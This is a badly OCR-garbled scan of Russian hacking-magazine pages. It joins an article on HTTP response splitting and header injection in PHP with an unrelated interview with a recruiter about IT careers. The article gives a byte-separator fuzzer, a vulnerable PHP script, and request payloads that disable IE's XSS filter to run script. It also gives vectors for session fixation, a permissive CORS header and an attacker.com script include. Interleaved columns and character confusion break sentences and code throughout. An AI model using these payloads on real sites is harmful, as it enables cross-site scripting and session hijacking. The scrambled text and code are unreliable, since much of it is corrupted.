П олучается, только lпtегпеt Е хрlогег понимае т куки в таких хидерах. Таким образом, всего-навсего прочитав

RFC

и просмо т рев

исходник и РН Р и три строки т естово г о кода, мы уже выяс н или, как

обойти филырацию функции headeг[J для

IE, и существенно рас­

ширили область применения большинства уязвимостей, которые

~

*

0

Веб

localhost:8080/php·smug/index2.php

Warning: Header may not contain more than \indexl.pbp on line 2

а

single header, oe\v line detected. in

'1

раньше классифи ц иро в алис ь т о л ько как О реп Rediгect. Н о небу­ дем останавливаться на дости г нутом и двинемся дальше. Впереди другие браузеf)Ы и новые идеи.

Работа фильтра функции headeгll в РНР с 2006 года вызываетта кую ошиб к у

+ Д а, ч т ение исход н ых кодов РНР и рассуж д ение с точки зрения

здравой логики уже дало с в ои п ло д ы. Мы нашли сnособ внедрения заголовков для браузера lпteгnet Е хрlогег. Пре д лагаю не останав­

*0

~

Веб

localhost8080/ php·smug/index2.php

Warning : Cookie names can not contain any ofthe foJlo,ving '=,; \t\r\n\013\014' in \indexl.pbp on line 2

'1

ливаться на достиг н у т ом и n р о д олжить начатое исс л едование, что­

бы попробовать доби т ься того же и для д ругих браузеров.

Итак, исходники Р Н Р говорят о филырации % 0а [\nили LFI.

Рабо та ф и льтр а фун к ци и setcookiell по первому аргумен ту

Предnоложим, что сущес т вую т какие-то бай т ы, которые могут ~

служи т ь раз д елителями заго л овков для браузеров. Д л я nроверки этого предпол��жения напишем простой фаззер и запустим его под

различными браузерам и. Н аиболее важные куски кода фаззера

*0

nри в е д ены ниже :

'1

#! / usr / bin / perl use str i ct ; use warni ng s; use Socket ;

Веб

loca lhost8080/ php·smug/ index2.php

Warning: Cookie values can not contain any ofthe foJlowing ',; \t\r\n\013\0 14' in \indexl.pbp on line 2

Работа фильтр а функци и setcookiell по второму аргументу

н улл-байт. Информацию об этой уязвимости я отправил произво­

дителю. Ей был присвое н номер 95992 и уровень риска Low [это не позволило мне получить вознаграждение за ее обнаружение,

listen SERVER , 1е ; $an sw = "НТТР/1.1 2ее OK\r\n" ; for ($ i =e ; $i <256;$i++ ){ $an sw.= "Set-cookie: cook-$i=1" .c hr($i);

что, в общем, справедливо - это ведь скорее ба г, чем уязвимость!.

ту

В итоге в 15-й версии Хрома нул л-байт уже поправи л и, а к моме нт у выхода этой статьи, подозреваю, актуальной будет уже 17-я версия бра у зера. F i гefox же остается на высоте, nоскольку реализован в этой части ровно так, как описано в

$answ .= "\r\n\r\n<h1>Test splitting bytes</h1>" ;

RFC. Следовательно,

ни один

из найденных нами способов обхода филыров Р Н Р для него рабо­ тать не будет. Фаззер очень простой: с его помощью мы выясняем, может

ли какой-т о один байт [под ч ерки в аю, именно одиночный байт,

РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ

XSS

а не д ублет! служит ь раздели т елем заголовков в браузерах, как

Настало время воспользоваться найденными в фильтре ошибка­

CR LF [%0d%Dal. Д ля э т о г о на сокетах nишем веб - микросервер,

ми и nроэксnлуатировать уязвимости функции headeг[J, то есть

ко т орый на любой НТТ Р-за п рос браузера дает о т вет, со д ержащий

провести не посредственную атаку. Здесь перед нами встает

х идеры

Set-cookie,

разделенные каждым из

256

байт по очереди.

Соот в етственно, если какой-то байт срабатывает как разделитель,

новая проблема - сами браузеры имеют встроенный механизм защиты от расщепления ответа . Вот как сложно оказывается

поя в ляетс я новый кукис, если же не срабатывает, то к значению

порой эксплуатировать с l iепt - sidе-уязвимости: сначала борешь­

текущего кукисадописывается строка ви д а

ся с фильтрами на серверной стороне, а потом бьешься еще и с

<«N>Set-cookie :.. >> . За­

пускаем скрипт, заходим с помощью браузера, считаем количество проставленн ы х куки, смотрим, какие байты с р аботали, затем nро ­

клиентскими.

Итак, расщепление отве т а глав н ым образом основано на пере­

буем следующий браузер. П роцедура не очень у т омительная, так

даче ложного заголовка Content-Leпgth, который должен говорить

как для тестов мы берем только самые популярные браузеры, кото­

браузеру, сколько байтов содержится в теле НТТР-ответа. Однако

рых всего п я т ь

:-1. Тем

не менее, рекоме нд ую т ебе самос т оятельно

п ри вызове headeг[J сам Р НР отправляет о д ин заголовок Coпtent­

модифицировать фаззер хотя бы для автоматизации подсчета куки

Leпgth со значением О, от этого никуда не деться. Таким образом,

и поиска разделителей [исходники фаззера ищи на нашем диске!.

классический НТТР Response Splitting [расщеnление НТТР-ответаl

Получаются вот такие и н тересные резул ьтаты:

работает только тогда, когда браузеры воспринимаю т второй за­ головок

Content-Length

как истинно верный. Здесь и начинаются

проблемы, поскольку ни один современный браузер так не де­

8/9 %ed Fi r efo x 7 Oper a %ed Chrome %ed %ее ( Is s ue 95992 fi xed i n re l . 15) Safa r i %ed н

лает. Тем не менее, можно nровести атаку для lnteгnet Е хрlогег, воспользовавшись т ем, что этот браузер расnознает Н Т МL-код в от­ вете, даже не читая хидер

Content-Length.

Это более чем странное

nоведение имеет место в браузере с 6-й по 9 - ю версию . П ишем уязвимый Р НР -сценарий:

Как видно, все браузеры, кроме F iгefox, воспринимают оди­ ночный

CR

т очно так же, как и всю последовательность

CR LF.

Вот э т о уже настоя щ ий резул ьтат, благо д аря ко т орому можно н е только выя в и т ь уязвимость, но и сделать атаки на ее основе

<?php header( "X-Header: aaa" .$_GET ( 'r' ] ); ?>

по-настоящему кросс-браузернымиl Отмечу, что, когда я начинал эти из ы ска н ия, ак т уальной была 14-я версия

Goog le C h гome,

дл я

к оторой также существовал альтернативный байт-разделитеть -

Х АКЕР ОЗ/15 8/ 2 01 2

Затем n рово д им атаку nод l nteгnet Е хрlогег посре д ством вот такого НТ ТР -заnроса :

027


COVERSTORY обсудили. Еще один IЕ'шный заголовок, X-Content-Type-Options, ·

/index.php?r=foobar%ed<html>%ed<hl> TEST </h l >

предоставляю тебе разобрать самостоятельно. Остальные заголов ­ ки для управления безопасностью поддерживаются всеми браузе­

Вывод этого с крипта ты сможешь увидеть на соответствую­

щем скриншоте. На первый взгляд, всё уже хорошо. Однако нас

рам и . Однако запомни как аксиому следующее утверждение: заго ­

ловки перезаписываются [за исключением Content-Length). Таким

блокирует встроенный в браузер ХSS-фильтр, когда мы пробуем

образом, header( "Location:

внедрить воттакой сценарий :

дает полноценную уязвимость Open Rediгect при эксплуатации

/index .php?r=foobar%ed<html>%ed<script > alert(/Splitting/)</script>

хотите- верьте, хотите- проверьте. Сейчас я не буду nеречислять

/index.php?lang=" .$_GET[ 'lang' ])

вектора ?lang=aaa % 0dlocation:http://yandex.гu. Как говорится, все возможные заголовки lпрочитать о них ты сможешь на соответ­ ствующей врезке), а остановлюсь лишь на самых значимых. Итак, Access-Contгoi-AIIow-Oгigin- это за гол овок, который

Пройти такой путь и не получить желаемого результата, упер­ шись в какой-то там фильтр,- это не для нас. Вспоминаем, что мы

работает nочти nод всеми браузерам и, кроме Орега, в том числе

можем не только управлять телом ответа сервера, но и внедрять

под lnteгnet Ехрlогег 8+, Fiгefox 3.5+, Safaгi 4+ и Google Chгome. Для

заголовки. К тому же ХSS - фильтр lпtегпеt Ехрlогег, несмотря на то

начала советую ознакомиться с первоисточником lmzl.la/4sгnwml.

что он сильно прибавил в сигнатурах по сравнению с 9-й версией

Как видно, этот заголовок можно использовать с дополнительными

браузера, всё так же, как и раньше, отключается с помощью специ­

за гол о в ка ми Access-Contгoi-AIIow- Methods,

ального заголовка X-XSS-Pгotectioп: О. Ну вот, последний кусочек пазла встал на место, и теперь можно проводить полноценную

Headeгs, Access-Contгoi-Max-Age и некоторыми другими [снова обрати внимание на приведенную выше ссылку ). Назн аче ни е этих

атаку.

заголовков, думаю, ясно из их названий. Access-Contгoi - AIIow­

Финальный НТТР-запрос к уязвимому сценарию имеет следую­

Access - Contгoi-AIIow­

Oгigin можно исnользовать как для усиления, так и для ослабления безоnасности . Всё дело в том, что если этот заголовок не содер ­

щий вид:

жится в ответе, пришедшем от сервера, то доступ через XHR к со­

/index2 .php?r=foobar%edx-xss-Protection:e%ed<html>%ed <script >a lert( /xss/)</script>

держимому тела такого ответа запрещен. Таким образом, мы можем внедрить заголовок «Access-Contгoi-AI I ow-O гigin : •" и nрочитать полный ответ со всеми конфиденциальными д анными.

ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ Мы начали с чтения RFC, затем заглянули внутрь РНР, потом плав­

ОСМАТРИВАЕМСЯ

но перешли к изучению механизмов, применяемых браузерам и для

Итак, мы нашли определенные уязвимости функции headeгll. На­

обработки ответа, и вот, наконец, получили важные результаты.

стало время узнать, существуют ли какие-нибудь другие функции,

Мы разобрались с lntегпег Е хрlогег и рассмотрели внедрение за­

выnолняющие аналогичную фильтрацию. Собственно, в РНР име­

головков в НТТР -о тв ет. Сам метод не является частным случаем

ется всего три функции, которые занимаются о тправ кой заголов­

расщепления ответа, так как при его использовании появляется

ков: headeгll, setcookiell и setгawcookiell. В результате недолгого

только лишний заголовок, а не вторичное тело ответа. А если мы

изучения легко выясняется, что две последние функции, так же

не внедряем тело ответа, то и проблем с Conteпt-Length у нас тоже

как и headeгll, уязвимы в аргументах $path и $domain . Уязвимые

не будет, ведь, согласно RFC, протокол НТТР никак не регулирует

аргументы есть, но их модификация пользователем в Приложениях

количество заголовков . Теn ерь предлагаю nойти дальше и nристу­

встречаетс я довольно редко. Обычно от nользовательских nара­

пить к изучению др угих потенциально внедряемых заголовков, тем

метров зависит только имя или зна чени е куки, но никак не домен

более что мы еще не выяснили, как проводить атаку под остальны­

и не путь . Поэтому исследование следует продолжить . В имени и значениикукивыполняется гораздо более строгая фильтрация,

ми браузерам и.

чем в функции headeгll:

ВНЕДРЯЕМ ЗАГОЛОВКИ Как уже было отмече н о выше, заголовки не влияют на Content-

Length, а значи т, их можно внедрить в НТТР- ответ для любых браузеров. В настоящее время существует н емало заголовков для управления безопасностью, один из которых, X-XSS-Pгotection, управляющий встроенным ХSS-фильтром l nteгnet Ехрlогег, мы уже

i f (name && strpbrk(name, "=,; \t\r\n\el3\el4" ) != NULL) { !* man isspace for \ еlЗ and \ el4 */ zeпd_error( E_WARNING, "Cookie names сап not coпtain any of the followiпg'=,; \\t\\r\\n\\el3\\el4' " );

ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 1. X-Frame-Options. Содержит список доменов,

Coпteпt-Security-Policy : allow http://*:80.

идентификатор сессии, а затем просто

с которых данный сайт может быть загружен

З.

подождать, пока пользователь авторизуется,

в ifгаmе/fгаmе-контейнер . Для проведения атаки можно использовать X-Frame-Optioпs : allow-fгom

attacker. 2. X-Content-Security-Policy.

Refresh . Старый добрый Refгesh . Дает внедрение HTML при использовании dаtа­ схемы или Open-гedirect : Refresh : 1,data:text/ html,<h1>0K</h1>. В таком содержимом Chгome

и использовать этот заголовок для вторичной

аутентификации. Вектор может выглядеть примерно следующим образом: foobaг :% 0d5et­

список доменов, с которых разрешается

сценарий выполняется не в целевом домене ,

Cо о k i е: Р Н Р5 Е 551 D= FA К Е D%0d Locat ion=/ auth.php. Разумеется, такая схема будет

загрузка содержимого . Скажем, если сервер

а в той самой data-c x eмe, что не позволяет

работать только в том случае, если веб­

устанавливает в ответе X-Content-Secuгity­

злоумышленнику провести

приложение после авторизации не отправляет

Policy : allow 'self', то код <script src="http://at-

4. Set-cookie. Его я привожу здесь

tackeг.com/1.js"><scгipt> работать на странице

исключительно для полноты. Используя

На практике

не будет. Таким образом, в значении для

этот заголовок, можно установить заранее

для 5ession Fixatioп !именно так называется

проведения атаки необходимо указывать Х-

готовый lто есть известный злоумышленнику!

эта атака!.

028

Содержит

фильтрует scгipt . Но, как бы там ни было,

XSS.

пользователю новый идентификатор сессии .

99% РНР-приложений уязвимы

ХАКЕР

03/158/2012


Расщепляй и властвуй

11[~ .tf] http://t~stcom:8080/php·smug/i ndexl.php?rsfoobar%0d <html > %0 Р

х

Find: j9

1

Conten t-Lenиth:

PI'N~ous Nежт.

1

1

..

С, Х ' ~ testcom

Options .. 1

2 Keep-Alive: timc:ou\-5, max"" IOO Connecrion: Keep-Ative Content-Type: textlhtml

TEST Content·Lengtb: 2 Keep-Alive: timeout=5, ma:-;;=1 00 Connectioп : Keep-Alive Content-Typc: textlhtml

IE распознает НТМL-содержимое даже

перед Coпteпt-Length, то есть прямо в заголовках

return FAILURE ; }

if ( !u rl_encode && value && strpbrk(value, ",; \t\r\n\013\814" ) != NULL) { /* man isspace for \ 813 and \ 814 */ zend_error( E_WARNING, "Cookie values сап not contain any of the following',; \\t\\r\\n\\813\\814'" ); return FAILURE;

1 lnternet

Eжplorer has mod ified this page to Mlp prevent cross·site кripting.

Срабатывание ХSS-фильтра в

IE

chrome 4896 safari 4891-LEN(cookie_name) opera 4896 firefox 4896 iexplore 5116- LEN (cookie_name) ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА Как всегда, лучше начать с чтения

RFC: www.ietf.oгg/гfc!rfc2109.txt . RFC следует обратить на фразу << at least 20 cookies рег unique host ог domain name». Здесь не говорится четко, следует ли браузерам хранить 20 кукинахост или 20 Особое внимание в этом

} Функция stгpbгkll возвращает ложь, если в первом аргументе присутствует хотя бы один байт из второго аргумента. Как видно,

куки на домен. Пусть сами решают. Видимо, в 1997 - м г оду это

фильтрация именикукиотличается от фильтрации значения только

казалось нормальным, но сейчас, когда существую т монстры

одним байтом- символом равенства. Прежде всего мне захотелось

с сотней поддоменов, этот вопрос более чем актуале н.

проверить функцию фильтрации. Она является полным аналогом

Итак, когда я прочитал этот

RFC,

то принялся искать настройки,

!вернее, прототипом] РНР'шной stгpbгk l php.su/fuпctioпs/?stгpbrk ] ,

определяющие максимальное количество к у ки в брауэерах, и про­

которая оказалась небинарно совместимой . Казалось, зто победа,

верять, распространяются ли эти настройки на nоддомены . Вот что

но не тут-то было! Дело в том, что сама встроенная в РНР функция

пол у чилось:

передачи ответа от сервера такженебинарно совместима, то есть

нулл-байт обрывает с тр оку как раз в том месте, где мы могли бы провести внедрение заголовка или тела отве т а. В итоге бра у зер получает уже укороченную по нулл-байту строку. Дальше был фаззинг, много фаззинга . И никаких идей о том, как обойти

фильтрацию, хотя в старых версиях РНР символ= не обрезается.

Новые версии не содержатуязвимости lя проверил их все с

chrome 188 safari -2888/ LEN (cookie_na me+cookie_va l) opera 68 firefox 149 iexplore 49

2010

года ] .

Как видно, эти значения не равны

20,

но все-таки суще­

ственно меньше 10000 :-].Что касается поддоменов, то общее

ОСОБЕННОСТИ

COOKIES

числокукисохраняется только для Орега и Chгome, остальные

Фаззин г всегда дает какой-то результат, пусть даже не совсем тот,

ведут отсчеткукиотдельно для каждого поддомена . Ситуация

на который рассчитываешь изначально. Эксперименты с фильтра­

забавная, потому что можно скинуть куки вышестоящего домена

цией внутри первых двух аргументов setcookiell и setгawc o okiell

с нижнего уровня . А можно ... Можно узнать имена куки выше­

тоже принесли свои плоды. Я выяснил забавные особенности об­

стоящего домена. РоС этого ба га для О ре га и Chгome фактиче­

работки куки в браузерах и хочу рассказать об этих особенностях

ски представляет собой общий скоуп о гр аниченного числа куки.

в с т атье. Ведь уязвимости вторичны по сравнению с теми метода­

Что будет, когда с ниже с тоящего домена придет IN+1]-й кукис?

ми, с помощью которых они были найдены. Как гласит китайская

Он перезапишет како й -токукис из скоупа. Правильно, а ка-

народная мудрость, отдашь свою рыбу- накормишь товарища

кой? Самый старый? Нет, в том и при кол, что он выберет кукис

на день, научишь его ловить рыбу- накормишь на всю жизнь .

по алфавит у . Пахнет бинарным поиском? Да, именно так! С по­

Но хва т ит лирики, перейдем непосредственно к результатам.

мощью этой штуки мы можем искать именакукивышестоящего домена с нижестоящего под Орега и Chгomel Н о писат ь ко д под

БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ

эту задачу муторно и не особенно нужно, ведь в реальной жизни

Если в качестве значения кукису передать больше символов, чем

значения куки куда важнее, чем их имена, которые, как правило,

поддерживает браузер, кукисне проставится. Я воспользовался

являются статическими. Итак, подведу итог. Оказывается, мож­

этой особенностью, когда мне на практике необходимо было до­

но скидывать куки, если есть возможность проставить много

биться того, чтобы такой вот код не ставил куки :

своих. Иногда для одного домена, иногда также для п оддоменов

ICh гome, Орегаl.

<? php setcookie( "param8" , "PREFIX_" .$_GE T[ 'p8' ]);

leilii;Jel В завершение статьи я бы хотел призвать тебя nродолжить мое

?>

исследование и начать свое, более современное и интересное.

Для решения этой задачи требуется

4096

символов . Предпо­

Надеюсь, мне удалось отразить не только суть различных ба го в

лагается, что лишняя длина обрежется. Однако абсолютно все

типа НТТР

браузер ы вообще не ставя т такие кукисыl Следовательно, если

ку и изучению. А если нет- обещаю найти время и си лы , чтобы

кукис уже существует, он не п ерезапишется. Это круто помогло при

написать новые статьи для журнала. На все воnросы

написании сплойта под уязвимость типа Sessioп Fixatioп. Вот такие

и не только с радостью отвечу в своем благе i oxod . гu ]. Сnасибо

показатели блокирующей длины значениякукиполучаются под

за внимание и до новых встречl :Х:

Response Splitting,

но и описать сам подход к их п оис­

no

с т атье

разными браузерам и:

ХАКЕР

03/1 58/20 12

029


COVERSTORY

&ИОГРАФИЯ Окончиnафакультет

журналистики МГУ.

Работала редактором 11 главным редактором в раэnичных иэданиях. Участвовала в соэдании портаnа гabota.ru, вэявwего nремию Рунета.

запустила проект PaбoтalaMa\\.Ru. Зкс-хантер Ma\\.Ru Gгoup.

Основатель агентства интернет­ рекрутмига PRUFFI. один иэ ведущих экспертов рынка хантинга в рунете.


Интервью с вед ущим хедх антером рунета

ИНТЕРВЬЮ С ВЕДУЩИМ

АЛЕНА ВЛАДИ М И РСКАЯ

ХЕДХАНТЕРОМ РУНЕТА

О РАБОТЕ ХАНТЕРА

fгiends). Каждый из нас является носи­

Многие воспринимают хедхантеров как раз­

до

1,5

миллионов рублей в месяц.

телем информации о тех людях, с кото­

датчиков хлеба в блокадном Ленинграде. Все

рыми работает. Именно вы, а не хан тер

Раз в квартал мы делаем свои обзоры,

думают, что если дружить с нами и знать вол­

сnособны nравильно оценить этих

где ставим реальные зарплаты (pгuffi.

шебный телефончик ведущего хантера в рунете,

людей. Вы работаете с ними каждый

гu/analitika) . Цифры , которые мы nри­

то зто как дополн и т ельная пай ка хлеба. Ты зна­

день и точно можете сказать, кто есть

водим, на

ешь продавщицу, и она вроде как может дать

кто: вот этому товарищу вообще ничего

тике от известных рекрутинговых nро­

тебе дополнительный сухарик . Н о на самом

нельзя nоручать, а вот этот реально

ектов. Почему? Объясню на nримере .

деле не может. Боле е того, во время блокады

крутой чувак.

30-40%

Мы знаем, что nрограм­

за зто расстреливали . Знание этого волшебного

телефона, по сути, ничего не дает.

мист на

Хантер обычно знает Но большинство технических

Буквально недавно у меня три дня не работала

сnециалистов - люди неnублич-

чинающий , так как сейчас это

счел меня каким-то

ные. Рекрутеру очень трудно до ни х добраться, потому что они закрыты

того, как я разместила объяв ление о том, что

внутри комnаний. К nримеру, в мэрии

:1

В результате

работает

800

ление. Когда мы видим вакансию

для RuЬу-nрограммиста за

nрограмм истов, но как

пания его не найдет. Однако в обзорах

ты до них достучишься? Как добраться

сотрудников, потому что мы не успевали раз­

до того человека, который реально сидит

бирать почту. Пи сьма падали такой лавиной,

и кадит nочту каждый день? Это nрактически

что весь

невозможно.

си дел и разбирал их неделю .

60 тысяч,

мы понимаем, что за такие деньги ком­

пришлось срочно набирать дополнительных

PRUFFI

100 тысяч

самое востребованное наnрав­

страшным спамером . А с л училось зто после

мы ищем людей для Google.

не может

рублей, если он не совсем на­

Бывают дни, когда у меня «сносят» почту.

Gmail

Ruby

стоить мень ше

только публичных людей.

почта, потому что

выше, чем в анали ­

зарnлат аналитики учиты вают занижен­ ные зарплаты, в результате чего итоговые

цифры получаются недостоверными .

ГДЕ РАБОТАТЬ?

Количествооткликовоченьзависитотсамой

Каждый программист знает такого же второ­

вакансии. В среднем бывает порядка

го . Он знает, что вот этот- хороший програм­

Если вы можете идти работатьврунет­

откликов, но до ходит и до обвалов. Летом была

мер , а этот- <<сачок» и ничего делать не будет.

идите в рунет! Ни один сектор не будет так

вакансия управляющего в венчурный фонд­

Мы открываем вам вакансии- рекомендуйте

развиваться , как рунет и

пришло около

своих друзей на эти вакансии . Это работа,

800 откликов за два дня .

В среднем одну вакансию вает от

50-60

PRUFFI

60 000 до 90 000 человек

но. То есть я давно уже СМИ.

просматри­

ежеднев­

:1

IT

в целом.

а любая работа должна быть оnлачена. Если

У крупных порталов всегда жуткая нехватка

она сделана усnешно и мы устроили человека

людей, особенно технических сотрудников .

по вашей рекомендации , мы вам заплатим. То есть клиент nеречислил нам деньги

Это богатые компании, и у них нет ограничений

вроде << в этом году мы воэьмем только

за хантинг. Мы , не раскрывая клиента, рассказали вам о том, что есть такая

замечательная вакансия. Вы кого-то

20

чело­

век, и не больше!>>. Они берут многих и заин­ тересованы во всех, у кого есть необходимый уровень комnетенции и адекватность.

nорекомендовали и, если хорошо

Хантер не является носителем

сделали свою работу, nолучили

какой-то супертайны и су­

вознаграждение

перэкспертизы. Что до нас

1000 евро.

Это

кажется нам сnраведливым.

представлял собой средний

Если вы выбираете, чем заниматься в рунете,

и у вас хоть немного математический склад ума- учитесь программить. Даже если потом

вы не будете nрограммировать, ценность пре­

хантер? Очень д орогой

Раньше за рекомендации

дакта [Pгoduct Manageг'al, который в прошлом

костюм, суперджип- в се на вор оты.

никто не платил. Н о в результате нашего

Он приезжал, выкладывал ай пади к,

подхода о гр омный объем данных оспе­

центов на

айфончик и еще

циалистах, о профессионалах , вышел

договориться с nрограммистами. Наnрим ер,

наружу .

я не смогу с ними договориться- любой

15

молескинчикав

и говорил клиенту: <<Мои услу ги стоят

Мы заявили, что никакой <<офигенной

30.

Почем у? Пот ому, что вы сможете

nрограммер меня обманет.

три оклада кандидата, потому что я об­

ладаю офигенной эксnертизой».

это умел, будет значительно выше- nро­

:1

Он скажет: <<это

РRUFFiпервойсталауказыватьзарпла­

невозможно» или <<чтобы это сделать, нужно

ты в топовом сегменте рунета. То есть

два года >> [хотя в реале- три дня), и я ему nо­

буквально: <<Э та позиция с т оит рублей в месяц. Эта стоит

эксперты на рынке- все вы. Для этого мы

Через нас люди узнали о величине компенса­

nридумали приложение для социальных сетей

ций вице-nреэидентов nорталов: стало nонят­

Рунет долго был закрытой системой, где

PRUFFI Fгiends [apps.facebook.com/pгuffi

но, что тоn-менеджеры nолучают от

вершиной карьеры была работа в Яндексе . То

03/158/201 2

рублеЙ >>.

верю. Если вы разбираетесь в коде, вам будет

экспертизы» не существует. На самом деле

ХАКЕР

600 тысяч

400 тысяч

700

тысяч

значительно легче. И вашей команде тоже.

031


.. COVERSTORY есть ты шел-шел, и становилось ясно: в конце

Смотрите на мир с точки зрения «мобиль­

идет о зарплатах от

концов тебе нужно прийти в Яндекс, начать

ности». Доступ к интернету с компьютера

понятно- очень большая степень ответствен­

там работать- и для тебя это будет санаторий.

уходит в прошлое. Он, конечно, и дальше будет

ности. У нас были такие запросы от банков, ко ­

Яндекс был чем-то вроде Олимпа! Боги все

использоваться для посещения интернет­

торые проходили, видимо, по верхней границе

сидели в Яндексе. Они именно с таким рас­

ресурсов, но еще год-два, и компьютер

четом строили свой НR-бренд: все эти гамаки,

перестанет быть основным устройством

бесплатная еда и прочие бонусы. В коридорах

для этого. Такими устройствами ста-

там можно' встретить Илью Сегаловича . При­

новятся мобильные и планшетники.

глашение работать в Яндексе было равносиль­

Почему это важно с точки зрения

но тому, что к тебе спустился Зеве и погладил

карьеры? Потому, что програм-

тебя по голове.

:1

И в Яндексе действительно

диапазона

200 000

рублей и выше . Это

-180-200 тысяч

рублей . Порталы

предлагали меньше- порядка

100-120

тысяч . Бывали запросы и от системных интеграторов, там где-то порядка

140

тысяч . Это цены по Москве.

мисты, и продакт-менеджеры,

хорошо . Но это давно не единственная воз­

и всё, что сегодня делается для

можная конечная точка карьеры.

мобильных платформ Andгoid, SymЬian,

КАРЬЕРА ПРОГРАММИСТА Сегодня самое прекрасное

liOS, Windows

-быть программ истом.

Перестаньте думать в рамках рунета. Интер­

Phonel,- всё востребован но. И будет

Вы понимаете основы бизнеса, основы

нет стал международным. В Россию пришли

востребован но. Зарплаты растут по всем

профессии, вас легче всего поднимать

все ведущие компании, а кто не пришел, тот

направлениям.

и растить. Ведь бизнес- он не про сер­

придет в течение года. Мы искали сотрудников

вера. В основе нашего бизнеса лежит код.

для русского

Интернетстановитсявсёболеесегмен­

Это и есть платформа. Поэтому, если вы

для

тированным. Раньше вы могли строить

умеете программить, ваша карьера будет

Facebook и Google, мы искали Fouгsquaгe, для Linkedln и многих других

компаний. Неважно, придет ли компания сама,

карьеру следующим образом: сегодня я

развиваться настолько, насколько вы за­

как

РМ

хотите расти и насколько этому помешает

Linkedln,

или купит какую-то другую ком­

IProduct manageri, завтра занимаюсь

панию, как это сделал Gгoupon. Прис утствие

маркетин гом , послезавтра- снова РМ,

будет! Поэтому смотри на мир шире, смотри

дальше вообще главный редактор. Сей-

личная жизнь.

на мировые тренды- это поможет тебе и в

час, к сожалению или к счастью, всё больше

У программиста много путей развития.

карьере в том числе.

требуется узкая специализация. Тот же марке­

Первый- вы можете всю жизнь любить код.

тинг начинает делиться на кучу направлений:

В таком случае вы сначала становитесь nро­

Я не считаю, что он разделен на нашу Пре­

вот трафик, вот контент, вот брендинг и так

грамм истом, потом руководителем группы, по­

красную Страну и весь остальной ад. Уверена,

далее. Надо выбрать одно направление: если

том руководите разработкой крупного портала.

что человеку должно быть интересно работать

пять лет назад вы могли бы спокойно nерейти

Это если вы не хотите останавливаться. Или

и интересно расти, что он сам волен выбирать .

из сегмента брендинга в сегмент, связанн ый

второй вариант- сначала вы работаете про­

Зарплаты !именно в интернет-сектореl у нас

с трафиком, то сегодня это будет довольно

граммистом, а потом РМ'ом технологического

сейчас сравнимые, а чаще даже выше, чем

сложно.

nроекта. Затем делаете свой стартап или, если

на Западе. Если человеку сейчас интересно по­ работать в центре игровой индустрии в

Zynga-

это технологическое направление вообще Винтернет nришло множество не интернет­

это понятно, и это его выбор. И если он уезжает

ных компаний. Например, МТС с

по приглашению

<<Связной» с

Zynga,

так как компания здесь

Enter.ru

Omlet.ru,

и т. д.- их очень много.

выделяется в отдельный бизнес при портале, руководите уже целым направлением. Класси­ ческий пример- Леша Терехов. Его я нашла,

не работает,- это тоже его выбор .

Они заинтересованы в привлечении

Не вижу здесь никакого предательства.

большого количества людей . Денег

риант- вы можете очень долго расти, а nотом

у них тоже много, они даже могут вы­

стать фактически евангелистом какого-либо

делять внутренние стартапы.

наnравления, как Гриша Бакунов в Яндексе.

PRUFFI

открыла стартапы как точку

развития. Но стартапы тоже нужно

когда он был в маленьком стартапе. Третий ва­

Ну и конечно, вы можете быть программистом,

разделять. С точки зрения найма

Не бойтесь уезжать учиться по хоро­

прийти в технологическую компанию и дорасти

мы выделяем две категории стар­

шим, интересным зарубежным про­

до ее гендиректора.

тапов: с инвестициями до $500 000 и более $500 000. Но это лишь один

граммам. Вы всегда сможете вернуться,

и в качестве классического примера здесь

если захотите. Но вернетесь более

можно nривести Дмитрия Гришина, который

из критериев. Очень важно объяснить

востребованными. Более того, смо­

начинал в

молодому человеку, который не всегда

жете, скорее всего, поднять там денег

генерального директора

сам хорошо это понимает, что не нужно

и вернуться уже не в статусе наемно-

идти в плохую компанию: там его об­

го работника, а в статусе создателя

манут, ничему не научат

бизнеса. Классический

и вообще будет стресс,

nример-СергейФаге

ад и всё плохо.

и его

Ostrovok.ru.

Таких

примеров довольно много.

Шансов сейчас много! Ты можешь выбирать направления для развития. То есть, условно говоря, если тебя не взяли в Яндекс

По сравнению с объемами с информационной безопасно­

-это не конец света . Если сейчас

стью, незначительна и несерьезна.

тебе хочется работать по найму, то

Спрос на специалистов, эанимающих­

дальше, возможно, захочется открыть

свое дело lи если это будет интернет/IТ, мы, опять же, nоможем!. Потом, если стартап

Molotok.ru,

ся информационной безопасностью, крайне мал. Но то, что он растет,- факт.

Это четвертый вариант,

а сейчас занимает пост

Mail.ru.

ПРО ТРЕНДЫ Нынешние тренды таковы:

1. Ruby- за

сезон востребованность програм­

мистов выросла на

более чем на общего бизнеса ниша, связанная

:1

2.

86 %,

а зарплаты поднялись

40 %.

Всё, что связано с мобильными платформа­

ми,- и разработка, и маркетинг.

3. 4.

Весь геймдев. Всё, что связано с

e-commerce,-

во с­

требованность и зарплаты за последний год выросли более чем на

50% . Это

направление

особенно востребован но.

Особенность зарождающегося тренда с��­

будет удачным, ты, возможно, продашь бизнес

стоит в том, что вилка зарплат чрезвычайно

и вернешься к работе по найму, но уже совсем

велика: сумма может варьироваться от очень

ков

на другом уровне . Мы показываем «объемную

небольшой до действительно крупной. Когда

мобильные и планшетные устройства начинают

картинку», а для многих людей это очень важно .

приходят подобные запросы иэ банков, речь

всё активнее использоваться для доступа к ин-

032

Наблюдается острая нехватка разработчи­

iOS

и Andгoid. Бизнес почувствовал, что

ХАКЕР

03/158/2012


Интервью с ведущим хедхантером рунета

тернету вместо стационарных компьютеров .

ни ков в Москву и, к примеру, компенсировать

и скажут: <<Вот тебе доля в компании и не­

Отрасль оказалась к этому не готова ни в плане

затраты на съем жилья, но нельзя сказать, что

сколько миллиардов, иди делай собственный

количества, ни в плане качества специалистов.

это массовое явление. Однако такие случаи

НR-дивизион>> , я что, откажусь? Нет. Нужно

Результат- резкий рост востребованности

учащаются.

пони мать , что мир сейчас полон шансов. Шанс

В любой большой компании всегда есть люди,

быть активным, чтобы повысить вероятность

Уменьшается популярность РНР-шников

которые уже переросли уровень работы

этого. Хотя бы вести благ.

и Регl-программистов. Если вы занимаетесь

по найму. Это ценные сотрудники: с ними всё

и зарплат мобильных разработчиков.

может появиться в любой день, и очень важно

Регl, вероятно, вам нужно подумать, на какой­

хорошо, но оставить их в наемных сотрудниках

